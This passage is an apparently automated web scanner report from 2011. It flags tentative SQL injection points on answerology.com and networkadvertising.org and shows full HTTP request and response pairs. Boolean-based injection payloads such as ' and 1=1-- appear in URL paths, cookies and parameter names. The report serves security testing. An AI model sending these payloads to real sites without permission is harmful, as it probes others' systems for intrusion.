<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cssjs/countdownTimer.js23080796'%20or%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:43 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...
1.36. http://www.answerology.com/index.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.aspx'%20and%201%3d1--%20?template=ads.ascx&topic=homepage&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:28:03 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /index.aspx'%20and%201%3d2--%20?template=ads.ascx&topic=homepage&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:28:04 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...
1.37. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /uploaded-images/801818/40x37_thumb.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 98525213%20or%201%3d1--%20 and 98525213%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:28:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /uploaded-images/80181898525213%20or%201%3d2--%20/40x37_thumb.jpg HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:28:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...
1.38. http://www.networkadvertising.org/managing/opt_out.asp [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:43:52 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.5000116'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.417152'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.1968892'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.5920985'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.4064707'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.open
...[SNIP]...

Request 2

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:43:54 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=7.551211E-02'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.9926525'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.7723897'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.167599'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.9819712'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.o
...[SNIP]...
1.39. http://www.networkadvertising.org/managing/opt_out.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 30670060'%20or%201%3d1--%20 and 30670060'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /managing/opt_out.asp?130670060'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:44:06 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<img width='239' height='45' name='opt_1' src='http://optout.imiclk.com/cgi/nai_status.cgi?nocache=0.5953485'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=1></td></tr><tr><td valign=top><b>AdBrite</b><br><a href=# onClick="window.open('2.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_2' src='http://www.adbrite.com/mb/nai_optout_check.php?nocache=0.512489'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=2></td></tr><tr><td valign=top><b>AdChemy</b><br><a href=# onClick="window.open('3.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_3' src='http://events.adchemy.com/visitor/auuid/nai-status?nocache=0.2922261'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=3></td></tr><tr><td valign=top><b>Adconion</b><br><a href=# onClick="window.open('4.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_4' src='http://ads.amgdgt.com/ads/opt-out?op=check&src=NAI&j=&nocache=0.6874354'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=4></td></tr><tr><td valign=top><b>Adara Media</b><br><a href=# onClick="window.open('5.asp', 'detailPopup', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=500,left = 100,top = 100');">More Information</a></td><td valign=top><img width='239' height='45' name='opt_5' src='http://optout.yieldoptimizer.com/optout/ns?nocache=0.5018076'>
</td><td valign=top align=center>Opt-Out<input type=checkbox name=optThis value=5></td></tr><tr><td valign=top><b>Adify Media</b><br><a href=# onClick="window.ope
...[SNIP]...

Request 2

GET /managing/opt_out.asp?130670060'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:44:06 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
